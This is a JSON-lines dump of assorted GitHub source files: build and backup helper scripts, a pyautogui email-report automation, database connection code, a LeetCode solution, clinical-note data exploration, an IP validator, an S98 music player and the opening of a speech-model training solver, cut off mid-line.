app.run(host='0.0.0.0')","repo_name":"shu0603n/Rest-API","sub_path":"app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70538490131","text":"import os\nimport sys\n\n\nproject_name = \"URLShortner\"\nbuild_directory = \"./build\"\nsrc_path = \"./cmd/URLShortner/main.go\"\n\nproject_build = os.path.join(build_directory, project_name)\n\nos.system(f\"go build -o {project_build} {src_path}\")","repo_name":"strCarne/URLShortner","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3923119200","text":"\"\"\"wages simulation\"\"\"\nfrom simulation.base import SimulationCategory, SimulationBase, Effect, SimulationEmotion\n\n\nclass WagesSimulation(SimulationBase):\n\t\"\"\"\n\t\twages simulation\n\t\"\"\"\n\t\n\tdef __init__(self):\n\t\tsuper().__init__(\n\t\t\t\"Wages\",\n\t\t\t\"The average wage level in your country. Wages are generally set by supply and demand, which roughly \"\n\t\t\t\"equates to the labor supply and the state of the economy (GDP). Immigration raises the labor supply, \"\n\t\t\t\"reducing wages, and high unemployment will also put downward pressure on wages. Labor laws, including \"\n\t\t\t\"minimum wages can push wages artificially higher, although this will have side-effects.\",\n\t\t\tSimulationCategory.economy,\n\t\t\t'simulation_wages.png',\n\t\t\t0.5,\n\t\t\temotion=SimulationEmotion.high_good\n\t\t)\n\t\t\n\t\t# connections:\n\t\tself.effects.append(Effect('_low_income', '-0.5 + (1.0 * x)'))\n\t\tself.effects.append(Effect('_middle_income', '-0.3 + (0.6 * x)'))\n\t\tself.effects.append(Effect('worker_productivity', '0.2 - (0.4 * x)'))\n","repo_name":"mrommel/SmartPopulation","sub_path":"simulation/simulations/wages.py","file_name":"wages.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9416088370","text":"import pyautogui # allow automations (screen, mouse and keyboard)\r\nimport time # delay\r\nimport pyperclip # allow automations\r\nimport pandas as pd # the \"pandas\" is for data analysis!\r\n\r\npyautogui.PAUSE = 1 # Os códigos serão executados em um intervalo de 1seg)\r\n\r\n# Step 1\r\n# Open Google on Desktop\r\ntime.sleep(4)\r\npyautogui.click(435,210, clicks=2)\r\n# Enter system link\r\npyautogui.click(485, 52)\r\npyautogui.write('https://drive.google.com/drive/folders/149xknr9JvrlEnhNWO49zPcw0PW5icxga')\r\npyautogui.press('enter')\r\n\r\n# Step 2\r\ntime.sleep(4)\r\npyautogui.click(396, 301, clicks=2)\r\ntime.sleep(1)\r\n\r\n# Step 3\r\npyautogui.click(407,371) # click on file\r\ntime.sleep(0.5)\r\npyautogui.click(1156,190) # click on the \"3 dots\"\r\ntime.sleep(2)\r\npyautogui.click(968,570) # click \"download\"\r\ntime.sleep(8)\r\npyautogui.click(496,414) # click \"save\"\r\n\r\n# Passo 4\r\ntabela = pd.read_excel(r\"C:\\Users\\LUCAS\\Downloads\\Vendas - Dez.xlsx\") # this \"r\" is important for python to understand the file path\r\nfaturamento = tabela[\"Valor Final\"].sum() # the sum of the \"Valor Final\" column\r\nquantidade = tabela[\"Quantidade\"].sum() # the sum of the \"Quantidade\" column\r\ndisplay(tabela)\r\n\r\n# Step 5\r\n# Open a new tab\r\ntime.sleep(4)\r\npyautogui.click(435,210, clicks=2)\r\n\r\n# Sign in to gmail\r\npyautogui.click(485, 52)\r\npyautogui.write('https://mail.google.com/')\r\npyautogui.press('enter')\r\ntime.sleep(8)\r\n\r\n# Click on the 'Write' button\r\npyautogui.click(98,208)\r\ntime.sleep(0.5)\r\n\r\n# Enter who we are sending to\r\npyautogui.write('lucascabralmendes.correa@gmail.com')\r\npyautogui.press('tab') # select email\r\npyautogui.press('tab') # move to email subject field\r\n\r\n# Enter the subject\r\nassunto = \"Relatório de Vendas de Ontem\"\r\npyperclip.copy(assunto)\r\npyautogui.hotkey(\"ctrl\", 'v')\r\npyautogui.press('tab') # move to email body field\r\n\r\n# Enter the body of the email\r\ntexto_email = f\"\"\"\r\nPrezados, bom dia\r\n\r\nO faturamento de ontem foi de: R${faturamento:,.2f}\r\nA quantidade de produtos foi de: {quantidade:,}\r\n\r\nAbs\r\nLucas Cabral\r\n\"\"\"\r\npyperclip.copy(texto)\r\npyautogui.hotkey(\"ctrl\", 'v')\r\n\r\n# click send\r\npyautogui.hotkey('ctrl', 'enter')\r\n","repo_name":"Lcmc23/data-science","sub_path":"Project 1/base code - project 1.py","file_name":"base code - project 1.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72035587730","text":"from sshtunnel import SSHTunnelForwarder\nfrom configparser import ConfigParser\nfrom peewee import PostgresqlDatabase\nfrom pymongo import MongoClient\nimport psycopg2\n\nconfig = ConfigParser()\nconfig.read('database.cfg')\nglobal_config = config['global']\n\npostgres_ssh_tunnel_config = config['postgres_ssh_tunnel']\npostgres_database_config = config['postgres']\n\nmongodb_ssh_tunnel_config = config['mongodb_ssh_tunnel']\nmongodb_database_config = config['mongodb']\n\npostgres_ssh_tunnel = None\npostgres_database = PostgresqlDatabase(\n postgres_database_config.get('db_name'),\n host=postgres_database_config.get('db_host'),\n port=postgres_database_config.getint('db_port'),\n user=postgres_database_config.get('db_user'),\n password=postgres_database_config.get('db_password'),\n)\nmongodb_ssh_tunnel = None\nmongodb_database = MongoClient(None)\n\n\ndef open_ssh_tunnel(ssh_tunnel_config):\n ssh_tunnel = SSHTunnelForwarder(\n ssh_address_or_host=ssh_tunnel_config.get('ssh_host'),\n ssh_port=ssh_tunnel_config.getint('ssh_port'),\n ssh_username=ssh_tunnel_config.get('ssh_username'),\n ssh_password=ssh_tunnel_config.get('ssh_password'),\n remote_bind_address=(\n ssh_tunnel_config.get('remote_address'),\n ssh_tunnel_config.getint('remote_port')\n ),\n local_bind_address=(\n ssh_tunnel_config.get('local_address'),\n ssh_tunnel_config.getint('local_port')\n )\n )\n ssh_tunnel.start()\n if not ssh_tunnel.is_active:\n raise Exception('Could not start SSH tunnel')\n return ssh_tunnel\n\n\ndef psycopg2_connect():\n global postgres_ssh_tunnel\n print('Connecting to database with psycopg2...')\n\n try:\n if global_config.getboolean('use_ssh_tunnel') and postgres_ssh_tunnel is None:\n postgres_ssh_tunnel = open_ssh_tunnel(postgres_ssh_tunnel_config)\n connection = psycopg2.connect(\n dbname=postgres_database_config.get('db_name'),\n host=postgres_database_config.get('db_host'),\n port=postgres_database_config.getint('db_port'),\n user=postgres_database_config.get('db_user'),\n password=postgres_database_config.get('db_password'),\n )\n print('Connected!')\n return connection\n except Exception:\n if postgres_ssh_tunnel:\n postgres_ssh_tunnel.close()\n\n raise\n\n\ndef postgres_connect() -> PostgresqlDatabase:\n global postgres_ssh_tunnel\n global postgres_database\n print('Connecting to database with peewee...')\n\n try:\n if global_config.getboolean('use_ssh_tunnel') and postgres_ssh_tunnel is None:\n postgres_ssh_tunnel = open_ssh_tunnel(postgres_ssh_tunnel_config)\n if postgres_database.is_closed():\n postgres_database.connect()\n print('Connected!')\n return postgres_database\n except Exception:\n if postgres_ssh_tunnel:\n postgres_ssh_tunnel.close()\n\n if postgres_database:\n postgres_database.close()\n\n raise\n\n\ndef mongodb_connect() -> MongoClient:\n global mongodb_ssh_tunnel\n global mongodb_database\n print('Connecting to database with pymongo...')\n\n try:\n if global_config.getboolean('use_ssh_tunnel') and mongodb_ssh_tunnel is None:\n mongodb_ssh_tunnel = open_ssh_tunnel(mongodb_ssh_tunnel_config)\n mongodb_database = MongoClient(\n authSource=mongodb_database_config.get('db_name'),\n host=mongodb_database_config.get('db_host'),\n port=mongodb_database_config.getint('db_port'),\n username=mongodb_database_config.get('db_user'),\n password=mongodb_database_config.get('db_password'),\n authMechanism='DEFAULT',\n ).dbd2g10\n print('Connected!')\n return mongodb_database\n except Exception:\n if mongodb_ssh_tunnel:\n mongodb_ssh_tunnel.close()\n\n if mongodb_database:\n mongodb_database.close()\n\n raise\n","repo_name":"giannilabella/python-orm-db2-um","sub_path":"src/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73706517329","text":"class Solution(object):\n def maxSubArray(self, nums: List[int]) -> int:\n maxSum = currentSum = nums[0]\n\n for n in nums[1:]:\n # if we were sure there are positive numbers in array (at least 1),\n # we could od (if currentSum < 0) -- drop and start over using the next number.\n # But that's not true, and we still need to cope with data like [-2,-1,-3]\n # So we start over when the previous sum is less than the current element\n if currentSum + n < n:\n currentSum = n\n else:\n currentSum += n\n # or, we can write:\n # currentSum = max(nums[i], currentSum + nums[i])\n\n maxSum = max(maxSum, currentSum)\n\n return maxSum\n","repo_name":"ululam/leetcode","sub_path":"0053-maximum-subarray/0053-maximum-subarray.py","file_name":"0053-maximum-subarray.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21237433247","text":"# classlar-sınıflar -start\n# fonksiyon ve değerleri- değişkenleri içerisinde tutabilen nesneler\n# oop- nesne yönelimli programlamada bu fonksiyonları burada tanımlamak yerine programladığımız alanları nesne olarak ele alıp bu nesnelere atama yapacağız\n# classlar da fonksiyonlar gibi tanımlanıyor tanımlanırken fonksiyonlarda kullanılan \"def\" kullanılmıyor \"class\" keyword ü tanımlanıyor.\n\nclass Human: #\":\" kullanıldığı için alt satırda yine bir tab içeri girilerek işlem yapılıyor. \n#içerisine fonksiyon tanımladığımız için yine \"def\" ile devam ediyoruz.\n #name= \"Özge\"\n #built -in\n def __init__(self,name):\n self.name= name\n print(\"Bir human instance'ı üretildi.\") #yapıcı blok alanı oluşturuldu. Biz bir nesne ürettiğimizde nesnenin çalıştırdığı bir alan oluşur. initialize ediyomuşuz gibi düşünebiliriz. yeni bir obje üretilmiş.\n #bir yapı üretilirken her zaman üretilmesi gereken bir değişken olabilir o yüzden yapıyoruz.\n def __str__(self) -> str:\n return f\"STR Fonksiyonundan dönen değer: {self.name}\" #return bir önceki elemana döndürür.\n def talk(self,sentence,):\n #name= \"Ercan\"\n print(f\"{self.name}: {sentence}\")\n #print(f\"{name}: {sentence}\")\n def walk(self):\n print(f\"{self.name} is walking..\")\n\n# instance => örnek #nesnelere erişebilmemiz için o nesnelerden birer örnek-instance oluşturabilmemiz gerekiyor\n# self => fonksiyonun kendisini ifade ediyor. Class içerisinde tanımlanan her fonksiyon için ilk parametre self parametresiyle rezerve edilmiştir. \n# self yerine humanobject yazılabilir. yani self yerine başka bir şey de yazabiliriz. self yazmak tercih edilebilir.\n\nhuman1= Human(\"Enes\")\nhuman1.name= \"Enes\" #bu satırın talk satırının 1 satır üstünde yapılması çıktıyı doğru görebilmemiz açısından önemli! #self.name ile yazılan ismi değiştirecektir\nhuman1.talk (\"Merhaba\")\nhuman1.walk()\nprint(human1)\n\nhuman2= Human(\"Cem\")\nhuman2.name= \"Cem\"\nhuman2.talk(\"Selam\")\nhuman2.walk()\nprint(human2)\n\nhuman3= Human(\"Özge\")\nhuman3.talk(\"Selam\")\nhuman3.walk()\nprint(human3)\n\nHuman(\"Melike\").talk(\"Merhaba\")\n\n# classlar-sınıflar -end\n\n\n\n\n\n\n\n\n\n\n#modules -end","repo_name":"ozgecetiner/Workshop","sub_path":"workshopday5class.py","file_name":"workshopday5class.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13921843826","text":"import pandas as pd\n\nimport glob\nimport unicodedata\nimport re\nimport csv\nimport numpy as np\nimport pprint\nimport os\n\nimport string\n\nall_letters = string.ascii_letters + \" .,;':\"\nn_letters = len(all_letters)\nprint(all_letters)\nentity_dict = {\"MEDICATION\": \"Drug\",\n \"FREQUENCY\": \"Frequency\",\n \"ROUTE_OR_MODE\": \"Route\",\n \"DOSAGE\":\"Dosage\",\n \"STRENGTH\": \"Strength\",\n \"FORM\": \"Form\",\n \"DURATION\": \"Duration\"}\n\nentities_re = re.compile('(%s)' % '|'.join(entity_dict.keys()))\ndef replace_entities_n2c2(s):\n def replace(match):\n return entity_dict[match.group(0)]\n return entities_re.sub(replace, s)\n\n\ndef find_files(path):\n \"\"\"\n returns a list of files in a path\n \"\"\"\n return glob.glob(path)\n\ndef flatten_json(y):\n \"\"\"\n :param y: the json you want to flatten\n :return: flattened json\n \"\"\"\n\n out = {}\n\n def flatten(x, name=''):\n if type(x) is dict:\n for a in x:\n flatten(x[a], name + a + '_')\n elif type(x) is list:\n i = 0\n for a in x:\n flatten(a, name + str(i) + '_')\n i += 1\n else:\n out[name[:-1]] = x\n\n flatten(y)\n return out\n\ndef flatten_list(l):\n \"\"\"\n input is list [[ ]]\n returns flattened list\n \"\"\"\n return [item for sublist in l for item in sublist]\n\ndef unicode_to_ascii(s):\n \"\"\"\n Turn a Unicode string to plain ASCII, thanks to http://stackoverflow.com/a/518232/2809427\n \"\"\"\n return ''.join(\n c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn'\n and c in all_letters\n )\n\n\ndef normalizeStringAndDigitsLower(s):\n s = unicode_to_ascii(s.lower().strip())\n s = re.sub(r\"([,.:!?])\", r\" \\1 \", s)\n s = re.sub(r\"[\\|]+\", r\" \", s)\n s = re.sub('\\n', '', s)\n s = re.sub('\\t', ' ', s)\n s = re.sub('\\d+', '#', s)\n s = re.sub(' +', ' ', s)\n return s\n\n\ndef build_vocab(vocab_min, infile, vocab_filename):\n \"\"\"\n INPUTS:\n vocab_min: how many documents a word must appear in to be kept\n infile: (training) data file to build vocabulary from\n vocab_filename: name for the file to output\n \"\"\"\n with open(infile, 'r') as csvfile:\n reader = csv.reader(csvfile)\n # header\n next(reader)\n\n # 0. read in data\n print(\"reading in data...\")\n # holds number of terms in each document\n note_numwords = []\n # indices where notes start\n note_inds = [0]\n # indices of discovered words\n indices = []\n # holds a bunch of ones\n data = []\n # keep track of discovered words\n vocab = {}\n # build lookup table for terms\n num2term = {}\n # preallocate array to hold number of notes each term appears in\n note_occur = np.zeros(400000, dtype=int)\n i = 0\n for row in reader:\n text = row[2]\n numwords = 0\n for term in text.split():\n # put term in vocab if it's not there. else, get the index\n index = vocab.setdefault(term, len(vocab))\n indices.append(index)\n num2term[index] = term\n data.append(1)\n numwords += 1\n # record where the next note starts\n note_inds.append(len(indices))\n indset = set(indices[note_inds[-2]:note_inds[-1]])\n # go thru all the word indices you just added, and add to the note occurrence count for each of them\n for ind in indset:\n note_occur[ind] += 1\n note_numwords.append(numwords)\n i += 1\n # clip trailing zeros\n note_occur = note_occur[note_occur > 0]\n\n # turn vocab into a list so indexing doesn't get fd up when we drop rows\n vocab_list = np.array([word for word, ind in sorted(vocab.items(), key=operator.itemgetter(1))])\n\n # 1. create sparse document matrix\n C = csr_matrix((data, indices, note_inds), dtype=int).transpose()\n # also need the numwords array to be a sparse matrix\n note_numwords = csr_matrix(1. / np.array(note_numwords))\n\n # 2. remove rows with less than 3 total occurrences\n print(\"removing rare terms\")\n # inds holds indices of rows corresponding to terms that occur in < 3 documents\n inds = np.nonzero(note_occur >= vocab_min)[0]\n print(str(len(inds)) + \" terms qualify out of \" + str(C.shape[0]) + \" total\")\n # drop those rows\n C = C[inds, :]\n note_occur = note_occur[inds]\n vocab_list = vocab_list[inds]\n\n print(\"writing output\")\n with open(vocab_filename, 'w') as vocab_file:\n for word in vocab_list:\n vocab_file.write(word + \"\\n\")\n\n\ndef letterToIndex(letter):\n \"\"\"\n find index for all letters\n \"\"\"\n return all_letters.find(letter)\n\n\n# def letterToTensor(letter):\n# \"\"\"\n# Just for demonstration, turn a letter into a <1 x n_letters> Tensor\n# \"\"\"\n# tensor = torch.zeros(1, n_letters)\n# tensor[0][letterToIndex(letter)] = 1\n# return tensor\n#\n#\n# def lineToTensor(line):\n# \"\"\"# Turn a line into a , or an array of one-hot letter vectors\"\"\"\n# tensor = torch.zeros(len(line), 1, n_letters)\n# for li, letter in enumerate(line):\n# tensor[li][0][letterToIndex(letter)] = 1\n# return tensor\n\n\nall_CNER_words = {}\nall_CNER_labels = []\n\n\n# Read a file and split into lines\ndef read_norm_lines(filename):\n lines = open(filename, encoding='utf-8').read().strip().split('\\n')\n return [line.split('||') for line in lines]\n\ndef make_dictionary_annotations_and_text(name):\n text_file_path = str(name) + \".txt\"\n text_norm_path = str(name) + \".norm\"\n note_text = open(os.path.join('/Users/isabelmetzger/PycharmProjects/ClinicalScorecard/data/train/train_note', text_file_path)).read()\n list_norm_annotations = read_norm_lines(os.path.join('/Users/isabelmetzger/PycharmProjects/ClinicalScorecard/data/train/train_norm', text_norm_path))\n annotation_dictionary = {'id': [], 'concept': [],\n 'beginCharacterOffset': [],\n 'endCharacterOffset': [],\n 'text': [],\n 'disjointed_concept': [],\n 'additionalBeginCharacterOffset': [],\n 'additionalEndCharacterOffset': [],\n 'additionalText': []}\n for list_norm in list_norm_annotations:\n annotation_dictionary['id'].append(list_norm[0])\n annotation_dictionary['concept'].append(list_norm[1])\n annotation_dictionary['beginCharacterOffset'].append(list_norm[2])\n annotation_dictionary['endCharacterOffset'].append(list_norm[3])\n annotated_text = note_text[int(list_norm[2]): int(list_norm[3])]\n annotation_dictionary['text'].append(annotated_text)\n if len(list_norm) < 5:\n annotation_dictionary['disjointed_concept'].append(None)\n annotation_dictionary['additionalBeginCharacterOffset'].append(None)\n annotation_dictionary['additionalEndCharacterOffset'].append(None)\n annotation_dictionary['additionalText'].append(None)\n else:\n annotation_dictionary['disjointed_concept'].append('Y')\n annotation_dictionary['additionalBeginCharacterOffset'].append(list_norm[4])\n annotation_dictionary['additionalEndCharacterOffset'].append(list_norm[5])\n annotation_dictionary['additionalText'].append(note_text[int(list_norm[4]): int(list_norm[5])])\n\n return pd.DataFrame(annotation_dictionary)[['concept',\n 'beginCharacterOffset',\n 'endCharacterOffset',\n 'text',\n 'disjointed_concept',\n 'additionalBeginCharacterOffset',\n 'additionalEndCharacterOffset',\n 'additionalText']] #.to_dict('records')# list_norm_annotations\n\n\n# pprint.pprint(make_dictionary_annotations_and_text('0038').to_dict('split'))\n\nexample_list_norm_annot = read_norm_lines(filename='/Users/isabelmetzger/PycharmProjects/ClinicalScorecard/data/train/train_norm/0214.norm')\n\ndef count_CUI(list_norm_annotations):\n \"\"\"\n this function takes a list of lists (with the norm annotations) and returns stats\n :param list_norm_annotations: '\n :return: counts of CUI, counts of CUI_less, counts of disjointed_CUI\n \"\"\"\n counter = 0\n disjointed_cui_counter = 0\n cui_less_counter = 0\n for line in list_norm_annotations:\n counter += 1\n if line[1] == 'CUI-less':\n cui_less_counter += 1\n if len(line) > 4:\n disjointed_cui_counter += 1\n\n return counter,cui_less_counter, disjointed_cui_counter\n\n\n\n\ndef return_eda_stats(file_list_path):\n \"\"\"\n\n :param file_list_path: pathname of file containing a list of core-names of .txt/text.norm files (for example:\n :return: a pandas data-frame with counts from each file\n \"\"\"\n file_list_text = open(file_list_path, encoding='utf-8').read().strip().split('\\n')\n path_name_main_list = [str(name_in_list) for name_in_list in file_list_text]\n eda_stats_dictionary = {'file_name_main': [],\n 'note_lines_count': [],\n 'CUI_count': [],\n 'CUI_less_count': [],\n 'disjointed_CUI_count': []\n }\n for path_name_main in path_name_main_list:\n eda_stats_dictionary['file_name_main'].append(path_name_main)\n text_file_path = str(path_name_main) + \".txt\"\n text_norm_path = str(path_name_main) + \".norm\"\n note_text_lines = open(os.path.join('/Users/isabelmetzger/PycharmProjects/ClinicalScorecard/data/train/train_note',\n text_file_path), encoding='utf-8').read().strip().split('\\n')\n eda_stats_dictionary['note_lines_count'].append(str(len(note_text_lines)))\n list_norm_annotations = read_norm_lines(os.path.join('/Users/isabelmetzger/PycharmProjects/ClinicalScorecard/data/train/train_norm', text_norm_path))\n eda_stats_dictionary['CUI_count'].append(count_CUI(list_norm_annotations)[0])\n eda_stats_dictionary['CUI_less_count'].append(count_CUI(list_norm_annotations)[1])\n eda_stats_dictionary['disjointed_CUI_count'].append(count_CUI(list_norm_annotations)[2])\n\n return pd.DataFrame(eda_stats_dictionary)\n\n\n\ndef calculate_average(*args):\n '''\n Function that accept variable length arguments\n :param args: numbers\n :return: average of numbers passed through\n '''\n num = len(args)\n if num == 0:\n return 0\n sum_of_numbers = 0\n for elem in args:\n sum_of_numbers += elem\n return sum_of_numbers / num\n\neda_stats_train = return_eda_stats('/Users/isabelmetzger/PycharmProjects/ClinicalScorecard/data/train/train_file_list.txt')\neda_stats_train.to_csv('eda_stats_train.csv', index=False)\n\n\n\n#\n# def amazon_convert_n2c2(amazon_output_list, outfile_path):\n# counter = 0\n# with open(outfile_path,'w') as f:\n# for x in flatten_list(example_list):\n# counter += 1\n# new_line = \"T\" + str(counter) + \"\\t\" + replace_entities_n2c2(x['Category']) + \"\\t\" + str(x['BeginOffset']) + \"\\t\" + str(x['EndOffset']) + \"\\t\" + x['Text']\n# print(new_line)\n# f.write(new_line + os.linesep)\n# if x.get('Attributes') != None:\n# attribute_list = x.get('Attributes')\n# for a in attribute_list:\n# counter += 1\n# a_line = \"T\" + str(counter) + \"\\t\" + replace_entities_n2c2(a['Type']) + \"\\t\" + str(a['BeginOffset']) + \"\\t\" + str(a['EndOffset']) +\"\\t\" + re.sub(\"\\n\", \" \",\n# a['Text'])\n# print(a_line)\n# f.write(a_line + os.linesep)\n# print(counter)\n\n# pprint.pprint(read_norm_lines('/Users/isabelmetzger/PycharmProjects/ClinicalScorecard/data/train/train_norm/0070.norm'))","repo_name":"izzykayu/ClinicalScorecard","sub_path":"exploring_notes.py","file_name":"exploring_notes.py","file_ext":"py","file_size_in_byte":12293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19595492219","text":"import os\nimport shutil\nimport time\nimport _thread\n\n\n# Caminho do Diretório do arquivo script.py\ncwd = os.getcwd()\n\ndef run_service(line):\n \"\"\" # \"\"\"\n while True:\n values = line.split('_')\n copy_interval = values[3]\n copy_interval = int(copy_interval)\n data_origin = values[1]\n data_destiny = values[2]\n\n try:\n os.system(f'robocopy \"{data_origin}\" \"{data_destiny}\" /R:1 /W:1 /MIR')\n except:\n log = open(fr\"{cwd}/assets/log.txt\", \"a\", encoding='utf-8') #MUDAR ISSO QUANDO FOR FAZER O EXE retirar /sistema-copias\n log.write(f'Falha ao copiar arquivos de {data_origin} para {data_destiny} verifique os diretórios \\n')\n log.close()\n\n # local = os.listdir(data_origin)\n # local_to = os.listdir(data_destiny)\n # for data in local:\n # if(data in local_to):\n # pass\n \n # else:\n # try:\n # # shutil.copy(os.path.join(data_origin, data), data_destiny)\n # # log = open(fr\"{cwd}/assets/log.txt\", \"a\", encoding='utf-8') #MUDAR ISSO QUANDO FOR FAZER O EXE retirar /sistema-copias\n # # log.write(f'Arquivo {data} copiado com Sucesso \\n')\n # # log.close()\n # except:\n # print('Não copiado')\n\n time.sleep(copy_interval)\n\n# Abrindo arquivo com os agendamentos\narchive = open(fr\"{cwd}/assets/agendamentos.txt\", \"r\", encoding='utf-8')\narchive = archive.readlines()\n\nfor _line in archive:\n _thread.start_new_thread(run_service, (_line,))\n\nwhile True:\n pass\n ","repo_name":"tiagojunker/Projetos-Python","sub_path":"Sistema-copias/assets/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21624868567","text":"import re\r\nn = int(input())\r\nlist_ip = []\r\nfor i in range(n) :\r\n ip_address = input()\r\n list_ip.append(ip_address)\r\nfor i in range(len(list_ip)) :\r\n if len(list_ip[i]) <= 500 :\r\n ipv4 = re.match(r'^(25[0-5]|2[0-4]\\d|1\\d\\d|[0-9]?\\d)(\\.(25[0-5]|2[0-4]\\d|1\\d\\d|[0-9]?\\d)){3}$',list_ip[i])\r\n ipv6 = re.match(r'^([0-9a-fA-F]{0,4}:){7}[0-9a-fA-F]{1,4}$',list_ip[i])\r\n if ipv4 :\r\n print('IPv4')\r\n elif ipv6 :\r\n print('IPv6')\r\n else :\r\n print('Bukan IP Address')","repo_name":"Riofuad/LAB-AP-02-2023","sub_path":"H071231076/Praktikum-8/TP8_2_H071231076.py","file_name":"TP8_2_H071231076.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13239694865","text":"#!/usr/bin/env python\n\nfrom __future__ import division, print_function, unicode_literals\nimport argparse\nimport io\nimport os\nimport signal\nimport sys\nimport time\n\nfrom module_controller import ModuleController\nfrom m3u import M3U\nfrom s98.s98 import S98, S98Error\n\n\nclass S98Player:\n\n playlist = False\n show_tag = False\n cancel = False\n repeat = False\n loop_count = -1\n\n def __init__(self):\n self.mc = ModuleController()\n\n @property\n def modules(self):\n return self.mc.modules\n\n def play(self, filename):\n if self.playlist:\n self.__playlist(filename)\n else:\n self.__play(filename)\n\n def __play(self, filename):\n file_bytes = None\n\n with io.FileIO(filename, 'rb') as f:\n file_bytes = f.readall()\n\n with io.BytesIO(file_bytes) as data:\n self.__play_s98(data)\n\n def __play_s98(self, f):\n self.s98 = S98(f)\n self.s98.reset_handlers.append(self.mc.reset)\n self.s98.write_handlers.append(self.mc.write)\n self.s98.mute_handlers.append(self.mc.mute)\n self.s98.repeat = self.repeat\n self.s98.loop_count = self.loop_count\n\n # tag = self.s98.tag\n if self.show_tag == True and self.s98.tag is not None:\n print(self.s98.tag)\n pass\n\n self.s98.play()\n\n def __playlist(self, filename):\n self.playlist = M3U(filename)\n while not self.cancel:\n for file in self.playlist.files:\n if self.cancel:\n break\n print(file)\n self.__play(file)\n\n def stop(self):\n if self.s98 is not None and self.s98.playing:\n self.s98.stop()\n while self.s98.playing and not self.s98.stopped:\n pass\n del self.s98\n self.cancel = True\n\n\ndef break_handler(signal, frame):\n print(\"Interrupted.\")\n player.stop()\n\n\nparser = argparse.ArgumentParser(description='Playback S98 data.')\nparser.add_argument(\"-t\", \"--tag\", action=\"store_true\", help='show tag')\nparser.add_argument(\"-l\", \"--list\", action=\"store_true\", help='load M3U playlist')\nparser.add_argument(\"-m\", \"--module\", type=str, help='RE:birth module identifier')\nparser.add_argument(\"-r\", \"--repeat\", type=int, help='Repeat song')\nparser.add_argument(\"file\", type=str, help=\"S98 file\")\nargs = parser.parse_args()\n\nsignal.signal(signal.SIGINT, break_handler)\n\nplayer = S98Player()\nfor i, m in enumerate(args.module.split(\",\")):\n player.modules[i] = m\nif args.tag:\n player.show_tag = True\nif args.list:\n player.playlist = True\nif args.repeat != None:\n if args.repeat > 0:\n player.loop_count = args.repeat\n else:\n player.repeat = True\n\nplayer.play(args.file)\n\n","repo_name":"tettoon/vgmplayer-rpi-re","sub_path":"s98player.py","file_name":"s98player.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"74960301010","text":"from model import Generator_MI, Generator_Decoder\nfrom model import InterpLnr\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nimport os\nimport time\nimport datetime\nimport pickle\nimport torch.nn as nn\nfrom mi_estimators import CLUBSample_reshape\nfrom utils import pad_seq_to_2, quantize_f0_torch, quantize_f0_numpy\nimport matplotlib.pyplot as plt\n# from VQ_Encoder import CPCLoss_sameSeq\n\ntorch.manual_seed(137)\n\n# use demo data for simplicity\n# make your own validation set as needed\nvalid_path = \"/ceph/home/yangsc21/Python/autovc/SpeechSplit/assets/test_mel/test.pkl\"\nvalidation_pt = pickle.load(open(valid_path, \"rb\"))\n\nMAX_LEN = 128 * 3\n\n\nclass Solver(object):\n \"\"\"Solver for training\"\"\"\n\n def __init__(self, vcc_loader, config, hparams):\n \"\"\"Initialize configurations.\"\"\"\n\n # Data loader.\n self.vcc_loader = vcc_loader\n self.hparams = hparams\n\n # Training configurations.\n self.num_iters = config.num_iters\n self.g_lr = config.g_lr\n self.beta1 = config.beta1\n self.beta2 = config.beta2\n self.resume_iters = config.resume_iters\n self.lambda_cd = config.lambda_cd\n self.use_l1_loss = config.use_l1_loss\n self.use_VQCPC = config.use_VQCPC\n self.use_VQCPC_2 = config.use_VQCPC_2\n self.use_pitch = config.use_pitch\n self.use_adv = config.use_adv\n self.use_mi = config.use_mi\n self.advloss = nn.CrossEntropyLoss()\n self.device_ids = config.device_ids\n\n # Miscellaneous.\n self.use_tensorboard = config.use_tensorboard\n self.use_cuda = torch.cuda.is_available()\n self.device = torch.device('cuda:{}'.format(config.device_id) if self.use_cuda else 'cpu')\n\n # Directories.\n self.log_dir = config.log_dir\n self.sample_dir = config.sample_dir\n self.model_save_dir = config.model_save_dir\n\n # Step size.\n self.log_step = config.log_step\n self.sample_step = config.sample_step\n self.model_save_step = config.model_save_step\n\n # Build the model and tensorboard.\n self.build_model()\n self.build_model2()\n\n self.cp_mi_net = CLUBSample_reshape(hparams.dim_neck * 2, hparams.dim_neck_3 * 2, 512)\n self.rc_mi_net = CLUBSample_reshape(hparams.dim_neck_2 * 2, hparams.dim_neck * 2, 512)\n self.rp_mi_net = CLUBSample_reshape(hparams.dim_neck_2 * 2, hparams.dim_neck_3 * 2, 512)\n\n self.optimizer_cp_mi_net = torch.optim.Adam(self.cp_mi_net.parameters(), lr=3e-4)\n self.optimizer_rc_mi_net = torch.optim.Adam(self.rc_mi_net.parameters(), lr=3e-4)\n self.optimizer_rp_mi_net = 